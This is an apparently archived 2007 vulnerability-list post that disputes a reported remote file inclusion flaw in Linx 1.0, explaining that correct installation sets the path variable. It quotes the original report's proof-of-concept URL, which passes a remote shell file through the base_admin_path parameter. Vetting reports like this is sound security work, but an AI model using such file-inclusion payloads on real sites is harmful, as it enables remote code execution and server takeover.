[VIM] False: Linx <= 1.0 (base_admin_path) Remote File Include Vulnerability
str0ke
str0ke at milw0rm.com
Thu Feb 1 10:07:52 EST 2007
download: http://www.kre8webdesign.com/media/download/linx-zip.zip
In the documentation it contains
Open up /new-pages/add.php and /new-pages/search.php and edit the
second line down in each file to point to the absolute path of
config.inc.php on your webserver..
include("/www/the/path/to/your/linx/admin/config.inc.php");
include($base_admin_path."templates/submit-rules.php");
config.inc.php contains:
$base_admin_path = '/www/path/to/linx/admin/';
Seems this script isn't vulnerable after installing the app correctly.
/str0ke
-------- received email edited below.
<?
include($base_admin_path."templates/submit-rules.php");
?>
http://[target]/[path]//new-pages/add.php?base_admin_path=[SHELL]
Example:
//new-pages/add.php?base_admin_path=http://[target]/[path]/shell.x
More information about the VIM
mailing list